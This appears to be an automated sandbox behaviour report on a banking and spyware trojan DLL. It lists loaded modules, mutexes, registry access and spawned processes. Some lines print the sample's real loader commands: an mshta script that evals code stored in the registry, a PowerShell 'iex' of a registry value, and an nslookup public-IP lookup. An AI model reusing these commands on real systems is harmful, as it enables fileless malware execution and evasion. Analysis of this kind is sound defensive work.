Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ~ .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: } .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: | .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: { .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: z .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: y .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: x .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: w .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: v .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: u .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: t .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: s .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: r .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: q .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: p .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: o .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: n .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: m .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: l .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: k .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: j .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: i .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: h .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: g .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: f .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: e .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: d .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: c .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: b .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: a .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ` .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: _ .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ^ .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ] .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: [ .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: z .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: y .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: x .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: w .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: v .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: u .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: t .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: s .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: r .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: q .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: p .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: o .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: n .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: m .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: l .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: k .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: j .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: i .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: h .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: g .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: f .dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: e .dll Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@49/188@15/6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8A648 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 1_2_04A8A648
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{59229456-2F94-11EB-90E6-ECF4BB82F7E0}.dat Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4360
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{0C6A49DB-FB1D-1E7B-E500-5F32E9340386}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{2C9A59B6-9B4F-3EC0-8520-FF528954A3A6}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user~1\AppData\Local\Temp\~DF876656104E15310A.TMP Jump to behavior
Source: vnaSKDMnLG.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: vnaSKDMnLG.dll Virustotal: Detection: 11%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\vnaSKDMnLG.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:82952 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17434 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17438 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17446 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17456 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 728
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:82952 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17434 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17438 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17446 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17456 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: vnaSKDMnLG.dll Static PE information: More than 246 > 100 exports found
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: vnaSKDMnLG.dll Static PE information: More than 200 imports for kernel32.dll
Source: vnaSKDMnLG.dll Static PE information: More than 200 imports for user32.dll
Source: vnaSKDMnLG.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.pdbXP source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
Source: Binary string: %p'U:\tautologism\throatlet\pignoration\schorly\gansel\early.pdb source: regsvr32.exe
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000018.00000002.404055652.00000252B2A30000.00000002.00000001.sdmp, csc.exe, 0000001A.00000002.411630452.000001870CDE0000.00000002.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.pdb source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
